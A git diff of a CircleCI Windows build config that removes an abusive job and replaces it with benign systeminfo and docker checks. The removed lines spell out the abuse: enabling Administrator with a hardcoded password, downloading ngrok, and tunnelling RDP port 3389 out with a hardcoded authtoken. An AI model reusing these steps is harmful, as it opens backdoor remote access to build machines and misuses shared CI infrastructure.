--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,22 +1,19 @@
-version: 2.1 
- 
+version: 2.1
+
 orbs:
   win: circleci/windows@2.2.0
- 
+
 jobs:
-  build: 
+  build:
     executor:
-      name: win/default 
-      size: "medium" 
- 
+      name: win/default
+      shell: powershell.exe
     steps:
-      - checkout      
-      - run: Set-LocalUser -Name "Administrator" -Password (ConvertTo-SecureString -AsPlainText "badboy1280" -Force)
-      - run: Get-LocalUser -Name "Administrator" | Enable-LocalUser 
-      - run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
-      - run: tar xf ngrok.zip
-      - run: Copy ngrok.exe C:\Windows\System32
-      - run: cmd /c echo ./ngrok.exe authtoken "1yFyus81KIzakoaM31b4gsyQxXW_5KsjatF972yvM3gBDcSSv" >a.ps1
-      - run: cmd /c echo cmd /k start ngrok.exe tcp 3389 >>a.ps1
-      - run: cmd /c echo ping -n 999999 10.10.10.10 >>a.ps1
-      - run: .\a.ps1
+      - checkout
+      - run: systeminfo
+      - run:
+          name: "Check docker"
+          shell: powershell.exe
+          command: |
+            docker info
+            docker run hello-world:nanoserver-1809
